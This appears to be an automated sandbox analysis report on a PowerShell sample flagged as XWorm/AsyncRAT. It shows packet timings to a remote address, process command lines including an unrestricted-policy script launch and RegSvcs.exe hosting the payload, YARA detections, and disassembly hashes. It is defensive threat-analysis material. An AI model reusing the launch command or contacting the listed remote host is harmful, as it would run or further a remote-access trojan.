                                      Dec 18, 2024 08:19:08.793859005 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:08.800193071 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:19:08.919997931 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:16.561474085 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:19:16.681483030 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:17.112171888 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:17.253400087 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:19:17.373033047 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:20.734181881 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:19:20.853813887 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:21.167140961 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:21.168993950 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:19:21.288633108 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:28.446367979 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:28.546215057 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:19:29.998960018 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:19:30.118959904 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:30.432749033 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:19:30.433857918 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:19:30.553673029 CET44114970592.255.57.155192.168.2.9

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:02:15:21
                                      Start date:18/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1"
                                      Imagebase:0x7ff760310000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:02:15:21
                                      Start date:18/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff70f010000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:02:15:24
                                      Start date:18/12/2024
                                      Path:C:\Windows\System32\ipconfig.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                      Imagebase:0x7ff718340000
                                      File size:35'840 bytes
                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:02:15:24
                                      Start date:18/12/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                      Imagebase:0xd50000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3916503959.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FF887B21083 Relevance: 3.2, Strings: 2, Instructions: 689COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512890714.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887b20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: bJ$ bJ
                                        • API String ID: 0-259344987
                                        • Opcode ID: ab3647bf1a015e02f13123bb33d117738af889b09cb502340bbae8a0f2dd7cca
                                        • Instruction ID: ced45464764e9c2aa93f2ac3af7af44ce5618c48bf6ae762b36f24e37910cdb4
                                        • Opcode Fuzzy Hash: ab3647bf1a015e02f13123bb33d117738af889b09cb502340bbae8a0f2dd7cca
                                        • Instruction Fuzzy Hash: 34122532E5EA8D4FE796DA2C58556B93BE2FF96350B4801FAD04DC7193ED18AC06C381
                                        Function 00007FF887B21304 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512890714.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887b20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: bJ
                                        • API String ID: 0-3573994042
                                        • Opcode ID: 804cba145f9657cdbb17da5aff5ee71cca96896a2385efa0ec0a56c45b9539a3
                                        • Instruction ID: 22bb0167399b08533e81ec6a1f1976300ba4556b6b0f1c6d643e3a8b64e1d8c7
                                        • Opcode Fuzzy Hash: 804cba145f9657cdbb17da5aff5ee71cca96896a2385efa0ec0a56c45b9539a3
                                        • Instruction Fuzzy Hash: D461F331A5EACE4FE7969B6C54642B87BF2FF56390B9801FAD04DCB193E9189C05C341
                                        Function 00007FF887A537B5 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512455707.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887a50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                        • Instruction ID: c87ae5a9f8020a07a5664d9d9a682ad38aad8f0a55f0b56f7197af45680d94c5
                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                        • Instruction Fuzzy Hash: B201A77011CB0C4FD744EF0CE051AA6B3E0FB85364F10052DE58AC3651D636E882CB46
                                        Function 00007FF887A5C3D5 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512455707.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887a50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d81c499e1abc22664dd240f541a7602a98e4c1e1b626bb4d17753bea989df087
                                        • Instruction ID: 17a88a9d13f64f7de55a8d6409e954c07e9f3eb75d5f136f621fdf2c1876b05f
                                        • Opcode Fuzzy Hash: d81c499e1abc22664dd240f541a7602a98e4c1e1b626bb4d17753bea989df087
                                        • Instruction Fuzzy Hash: 07F0AF3184868D9FDB49EB64D4A9AED7FF0FF55300F4541EAD00ACB0A2DB39A949CB41
                                        Function 00007FF887A55ADD Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512455707.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887a50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37f0d8e619612d21874640dba971525420bf9359abbec3e5f98f24328e4e41d7
                                        • Instruction ID: 5760f93cb5313c4bedcc1ec627c1f36071c38c4260c53088fabdee91a6d4fc29
                                        • Opcode Fuzzy Hash: 37f0d8e619612d21874640dba971525420bf9359abbec3e5f98f24328e4e41d7
                                        • Instruction Fuzzy Hash: EEE0EC309085594FD791EB6498557A9B6F1BF58201F0044FA944ED7292DE742DC5CB01
                                        Function 00007FF887A59737 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512455707.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887a50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aabcfd91e8f55191a004931a183e6dcb2518b9a1ea28bfbd136d216059383d0f
                                        • Instruction ID: 2cf2181c1e1aa20770b3168e0806892b2844d78ad13680c24fb2a8562047a8a1
                                        • Opcode Fuzzy Hash: aabcfd91e8f55191a004931a183e6dcb2518b9a1ea28bfbd136d216059383d0f
                                        • Instruction Fuzzy Hash: 68D05E309592098FCB4CEF50C2624BD7772BF48744B20007ED40BAB281CB355902CB20

                                        Non-executed Functions

                                        Function 00007FF887A5044D Relevance: 7.6, Strings: 6, Instructions: 102COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512455707.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887a50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (0#$8,#$P/#$p0#$-#$/#
                                        • API String ID: 0-2162826562
                                        • Opcode ID: cd4087cd0e1e673d80b68f0cefdf08c0db9c7867198c942ddd94108b21b21fa5
                                        • Instruction ID: 0fdb71bd53bce7a25e5350a7eb138443a59c35d5a8a767dc30068886d1a036a4
                                        • Opcode Fuzzy Hash: cd4087cd0e1e673d80b68f0cefdf08c0db9c7867198c942ddd94108b21b21fa5
                                        • Instruction Fuzzy Hash: A331A352D4E6C68FE7178AB868A703E7F72BF12690B1D84FBC0988B0D7D4498D09C342

                                        Execution Graph

                                        Execution Coverage:14.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:46
                                        Total number of Limit Nodes:6
                                        execution_graph 12090 15e18e0 12091 15e18e4 12090->12091 12094 15e1bc9 12091->12094 12099 15e1ce0 12091->12099 12096 15e1bd0 12094->12096 12095 15e1cde 12095->12091 12096->12095 12104 15e2178 12096->12104 12108 15e2168 12096->12108 12101 15e1cb7 12099->12101 12100 15e1cde 12100->12091 12101->12100 12102 15e2178 3 API calls 12101->12102 12103 15e2168 3 API calls 12101->12103 12102->12101 12103->12101 12105 15e219d 12104->12105 12112 15e2e6a 12105->12112 12106 15e227e 12109 15e219d 12108->12109 12111 15e2e6a 3 API calls 12109->12111 12110 15e227e 12110->12110 12111->12110 12113 15e2e85 12112->12113 12114 15e31ba 12113->12114 12117 15e7f4a 12113->12117 12121 15e7f50 12113->12121 12114->12106 12118 15e7f50 12117->12118 12125 15e81e0 12118->12125 12119 15e7fd7 12119->12114 12122 15e7f75 12121->12122 12124 15e81e0 3 API calls 12122->12124 12123 15e7fd7 12123->12114 12124->12123 12129 15e8219 12125->12129 12137 15e8228 12125->12137 12126 15e81fe 12126->12119 12130 15e825d 12129->12130 12131 15e8235 12129->12131 12145 15e7b7c 12130->12145 12131->12126 12133 15e827e 12133->12126 12135 15e8346 GlobalMemoryStatusEx 12136 15e8376 12135->12136 12136->12126 12138 15e825d 12137->12138 12139 15e8235 12137->12139 12140 15e7b7c GlobalMemoryStatusEx 12138->12140 12139->12126 12142 15e827a 12140->12142 12141 15e827e 12141->12126 12142->12141 12143 15e8346 GlobalMemoryStatusEx 12142->12143 12144 15e8376 12143->12144 12144->12126 12146 15e8300 GlobalMemoryStatusEx 12145->12146 12148 15e827a 12146->12148 12148->12133 12148->12135

                                        Executed Functions

                                        Function 015EB598 Relevance: .9, Instructions: 909COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d18b337d2ad887342859b8b91f8634c5b0ac8e0b1fc5b69583702cdaadc223e9
                                        • Instruction ID: 397d3aa18f5dc4f4801435d1c9742a11c1d4270e987a3122c48e2e19c77b3fb1
                                        • Opcode Fuzzy Hash: d18b337d2ad887342859b8b91f8634c5b0ac8e0b1fc5b69583702cdaadc223e9
                                        • Instruction Fuzzy Hash: 54726A70E002199FDB19CFA9C898AAEBBF6BF88301F148469E555EB361DB31DD41CB50
                                        Function 015EC2D8 Relevance: .9, Instructions: 907COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2cd5e4716ad3c15fb5fd153888fbdb1f4ca655072caf4e3d8c899f74ba539e9e
                                        • Instruction ID: 108f8062f6050c368ee1be24bf340a4b974a638856195d52f4f40c4dd1ae7cd0
                                        • Opcode Fuzzy Hash: 2cd5e4716ad3c15fb5fd153888fbdb1f4ca655072caf4e3d8c899f74ba539e9e
                                        • Instruction Fuzzy Hash: B3823974A00209DFDB19CF68C988AAEBBF2BF88310F158559E5569F3A1D730ED41CB91
                                        Function 015E8618 Relevance: .3, Instructions: 332COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1109 15e8618-15e8627 1110 15e8629-15e862b 1109->1110 1111 15e8630-15e8640 1109->1111 1112 15e8a09-15e8a10 1110->1112 1114 15e8646-15e8654 1111->1114 1115 15e8a11-15e8a86 1111->1115 1114->1115 1118 15e865a 1114->1118 1118->1115 1119 15e89be-15e89ce 1118->1119 1120 15e86bd-15e86cd 1118->1120 1121 15e879b-15e87ab 1118->1121 1122 15e88d9-15e88e9 1118->1122 1123 15e89f5-15e8a01 1118->1123 1124 15e8751-15e8761 1118->1124 1125 15e8931-15e8937 1118->1125 1126 15e8828-15e8838 1118->1126 1127 15e8707-15e8717 1118->1127 1128 15e8887-15e8897 1118->1128 1129 15e87e5-15e87f5 1118->1129 1130 15e8661-15e8671 1118->1130 1131 15e8981-15e8991 1118->1131 1133 15e89e9-15e89f3 1119->1133 1134 15e89d0-15e89d6 1119->1134 1141 15e86cf-15e86d5 1120->1141 1142 15e86f2-15e8702 1120->1142 1135 15e87ad-15e87b3 1121->1135 1136 15e87d0-15e87e0 1121->1136 1137 15e88eb-15e88f1 1122->1137 1138 15e8915-15e892c 1122->1138 1123->1112 1151 15e8786-15e8796 1124->1151 1152 15e8763-15e8769 1124->1152 1145 15e893b 1125->1145 1146 15e8939 1125->1146 1147 15e883a-15e8840 1126->1147 1148 15e8867-15e8882 1126->1148 1149 15e873c-15e874c 1127->1149 1150 15e8719-15e871f 1127->1150 1153 15e88bb-15e88d4 1128->1153 1154 15e8899-15e889f 1128->1154 1143 15e87f7-15e87fd 1129->1143 1144 15e8813-15e8823 1129->1144 1139 15e869e-15e86b8 1130->1139 1140 15e8673-15e8679 1130->1140 1155 15e89ac-15e89bc 1131->1155 1156 15e8993-15e8999 1131->1156 1133->1112 1157 15e89d8-15e89da 1134->1157 1158 15e89e4-15e89e7 1134->1158 1159 15e87b5-15e87b7 1135->1159 1160 15e87c1-15e87cb 1135->1160 1136->1112 1169 15e88ff-15e8910 1137->1169 1170 15e88f3-15e88f5 1137->1170 1138->1112 1139->1112 1171 15e867b-15e867d 1140->1171 1172 15e8687-15e8699 1140->1172 1173 15e86d7-15e86d9 1141->1173 1174 15e86e3-15e86ed 1141->1174 1142->1112 1162 15e87ff-15e8801 1143->1162 1163 15e880b-15e880e 1143->1163 1144->1112 1175 15e893d-15e893f 1145->1175 1146->1175 1164 15e884e-15e8862 1147->1164 1165 15e8842-15e8844 1147->1165 1148->1112 1149->1112 1176 15e872d-15e8737 1150->1176 1177 15e8721-15e8723 1150->1177 1151->1112 1178 15e876b-15e876d 1152->1178 1179 15e8777-15e8781 1152->1179 1153->1112 1167 15e88ad-15e88b6 1154->1167 1168 15e88a1-15e88a3 1154->1168 1155->1112 1180 15e899b-15e899d 1156->1180 1181 15e89a7-15e89aa 1156->1181 1157->1158 1158->1112 1159->1160 1160->1112 1162->1163 1163->1112 1164->1112 1165->1164 1167->1112 1168->1167 1169->1112 1170->1169 1171->1172 1172->1112 1173->1174 1174->1112 1192 15e8950-15e897c 1175->1192 1193 15e8941-15e894b 1175->1193 1176->1112 1177->1176 1178->1179 1179->1112 1180->1181 1181->1112 1192->1112 1193->1112
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eeb80ee71921c4a7f653193a50032f74e54a20f907bf2730f3e4688bc7cb2fa1
                                        • Instruction ID: 2dfdda96a75c908cbddad114f7af58f9c306e257be853a2a5e2e9d6509b382da
                                        • Opcode Fuzzy Hash: eeb80ee71921c4a7f653193a50032f74e54a20f907bf2730f3e4688bc7cb2fa1
                                        • Instruction Fuzzy Hash: C4C18530E04219CBEF2C5FEA94183AD7BF2BFC8751F198819D442FA284DB748841DB65
                                        Function 015E5BC8 Relevance: .3, Instructions: 281COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1292 15e5bc8-15e5c2e 1294 15e5c78-15e5c7a 1292->1294 1295 15e5c30-15e5c3b 1292->1295 1297 15e5c7c-15e5c95 1294->1297 1295->1294 1296 15e5c3d-15e5c49 1295->1296 1298 15e5c6c-15e5c76 1296->1298 1299 15e5c4b-15e5c55 1296->1299 1304 15e5c97-15e5ca3 1297->1304 1305 15e5ce1-15e5ce3 1297->1305 1298->1297 1300 15e5c59-15e5c68 1299->1300 1301 15e5c57 1299->1301 1300->1300 1303 15e5c6a 1300->1303 1301->1300 1303->1298 1304->1305 1307 15e5ca5-15e5cb1 1304->1307 1306 15e5ce5-15e5d3d 1305->1306 1316 15e5d3f-15e5d4a 1306->1316 1317 15e5d87-15e5d89 1306->1317 1308 15e5cd4-15e5cdf 1307->1308 1309 15e5cb3-15e5cbd 1307->1309 1308->1306 1311 15e5cbf 1309->1311 1312 15e5cc1-15e5cd0 1309->1312 1311->1312 1312->1312 1313 15e5cd2 1312->1313 1313->1308 1316->1317 1319 15e5d4c-15e5d58 1316->1319 1318 15e5d8b-15e5da3 1317->1318 1325 15e5ded-15e5def 1318->1325 1326 15e5da5-15e5db0 1318->1326 1320 15e5d5a-15e5d64 1319->1320 1321 15e5d7b-15e5d85 1319->1321 1323 15e5d68-15e5d77 1320->1323 1324 15e5d66 1320->1324 1321->1318 1323->1323 1327 15e5d79 1323->1327 1324->1323 1329 15e5df1-15e5e42 1325->1329 1326->1325 1328 15e5db2-15e5dbe 1326->1328 1327->1321 1330 15e5dc0-15e5dca 1328->1330 1331 15e5de1-15e5deb 1328->1331 1337 15e5e48-15e5e56 1329->1337 1332 15e5dce-15e5ddd 1330->1332 1333 15e5dcc 1330->1333 1331->1329 1332->1332 1335 15e5ddf 1332->1335 1333->1332 1335->1331 1338 15e5e5f-15e5ebf 1337->1338 1339 15e5e58-15e5e5e 1337->1339 1346 15e5ecf-15e5ed3 1338->1346 1347 15e5ec1-15e5ec5 1338->1347 1339->1338 1349 15e5ed5-15e5ed9 1346->1349 1350 15e5ee3-15e5ee7 1346->1350 1347->1346 1348 15e5ec7 1347->1348 1348->1346 1349->1350 1351 15e5edb 1349->1351 1352 15e5ee9-15e5eed 1350->1352 1353 15e5ef7-15e5efb 1350->1353 1351->1350 1352->1353 1354 15e5eef-15e5ef2 call 15e1f34 1352->1354 1355 15e5efd-15e5f01 1353->1355 1356 15e5f0b-15e5f0f 1353->1356 1354->1353 1355->1356 1360 15e5f03-15e5f06 call 15e1f34 1355->1360 1357 15e5f1f-15e5f23 1356->1357 1358 15e5f11-15e5f15 1356->1358 1362 15e5f25-15e5f29 1357->1362 1363 15e5f33-15e5f37 1357->1363 1358->1357 1361 15e5f17-15e5f1a call 15e1f34 1358->1361 1360->1356 1361->1357 1362->1363 1366 15e5f2b 1362->1366 1367 15e5f39-15e5f3d 1363->1367 1368 15e5f47 1363->1368 1366->1363 1367->1368 1369 15e5f3f 1367->1369 1370 15e5f48 1368->1370 1369->1368 1370->1370
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 544ba69ac2b03bbd4b16658e3441d38a30d888c652949a65e1972f42957f4419
                                        • Instruction ID: 6ed04c14abdd632d375b24533da30c373033fedbdd963f5ad98b7adc976527be
                                        • Opcode Fuzzy Hash: 544ba69ac2b03bbd4b16658e3441d38a30d888c652949a65e1972f42957f4419
                                        • Instruction Fuzzy Hash: 44B18F74E10209CFDB18CFA9C88979EBBF2BF88318F148129D415EB254EB759946CB81
                                        Function 015E6498 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1450 15e6498-15e64fe 1452 15e6548-15e654a 1450->1452 1453 15e6500-15e650b 1450->1453 1454 15e654c-15e6565 1452->1454 1453->1452 1455 15e650d-15e6519 1453->1455 1462 15e6567-15e6573 1454->1462 1463 15e65b1-15e65b3 1454->1463 1456 15e653c-15e6546 1455->1456 1457 15e651b-15e6525 1455->1457 1456->1454 1459 15e6529-15e6538 1457->1459 1460 15e6527 1457->1460 1459->1459 1461 15e653a 1459->1461 1460->1459 1461->1456 1462->1463 1464 15e6575-15e6581 1462->1464 1465 15e65b5-15e65cd 1463->1465 1466 15e65a4-15e65af 1464->1466 1467 15e6583-15e658d 1464->1467 1471 15e65cf-15e65da 1465->1471 1472 15e6617-15e6619 1465->1472 1466->1465 1469 15e658f 1467->1469 1470 15e6591-15e65a0 1467->1470 1469->1470 1470->1470 1473 15e65a2 1470->1473 1471->1472 1474 15e65dc-15e65e8 1471->1474 1475 15e661b-15e6633 1472->1475 1473->1466 1476 15e65ea-15e65f4 1474->1476 1477 15e660b-15e6615 1474->1477 1482 15e667d-15e667f 1475->1482 1483 15e6635-15e6640 1475->1483 1478 15e65f8-15e6607 1476->1478 1479 15e65f6 1476->1479 1477->1475 1478->1478 1481 15e6609 1478->1481 1479->1478 1481->1477 1484 15e6681-15e66f4 1482->1484 1483->1482 1485 15e6642-15e664e 1483->1485 1494 15e66fa-15e6708 1484->1494 1486 15e6650-15e665a 1485->1486 1487 15e6671-15e667b 1485->1487 1488 15e665e-15e666d 1486->1488 1489 15e665c 1486->1489 1487->1484 1488->1488 1491 15e666f 1488->1491 1489->1488 1491->1487 1495 15e670a-15e6710 1494->1495 1496 15e6711-15e6771 1494->1496 1495->1496 1503 15e6773-15e6777 1496->1503 1504 15e6781-15e6785 1496->1504 1503->1504 1505 15e6779 1503->1505 1506 15e6787-15e678b 1504->1506 1507 15e6795-15e6799 1504->1507 1505->1504 1506->1507 1508 15e678d 1506->1508 1509 15e679b-15e679f 1507->1509 1510 15e67a9-15e67ad 1507->1510 1508->1507 1509->1510 1511 15e67a1 1509->1511 1512 15e67af-15e67b3 1510->1512 1513 15e67bd-15e67c1 1510->1513 1511->1510 1512->1513 1514 15e67b5 1512->1514 1515 15e67c3-15e67c7 1513->1515 1516 15e67d1-15e67d5 1513->1516 1514->1513 1515->1516 1517 15e67c9-15e67cc call 15e1f34 1515->1517 1518 15e67d7-15e67db 1516->1518 1519 15e67e5 1516->1519 1517->1516 1518->1519 1520 15e67dd-15e67e0 call 15e1f34 1518->1520 1523 15e67e6 1519->1523 1520->1519 1523->1523
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cc3bc9177cc3298ae0f8db39d2702a710041901b87b8bd5fdc9046f216bcd03
                                        • Instruction ID: 2e4fdc9861533d896cf520cc0e1694efa5b443a2a19ca28e42f87c13179a6227
                                        • Opcode Fuzzy Hash: 0cc3bc9177cc3298ae0f8db39d2702a710041901b87b8bd5fdc9046f216bcd03
                                        • Instruction Fuzzy Hash: 4EB17C70E102098FDB18CFA9C88979EBBF2BF98354F148529D815EB294EB749845CB81
                                        Function 015E8228 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4f111fcf274d918092cc63b5010f13c3c326721dd7755e4a1151b18c54e26dc
                                        • Instruction ID: 97e33fafeff5e679ae2dbcd978b3ae8282c2d1877b15b913a437cdb308bed916
                                        • Opcode Fuzzy Hash: c4f111fcf274d918092cc63b5010f13c3c326721dd7755e4a1151b18c54e26dc
                                        • Instruction Fuzzy Hash: A5411432E047868FDB15DFB9D8043EEBBF5FF89210F15866AC444AB251EB789845CB90
                                        Function 015E7B7C Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 24 15e7b7c-15e8374 GlobalMemoryStatusEx 27 15e837d-15e83a5 24->27 28 15e8376-15e837c 24->28 28->27
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,015E827A), ref: 015E8367
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 86c60337bbb4c4d41486aaab9a29e13f89055de3e0b1672c14831f2c112028ea
                                        • Instruction ID: a8132894b784befb0ce4b485a8d339b41cfcc203751429d85ab95d5855bfd81d
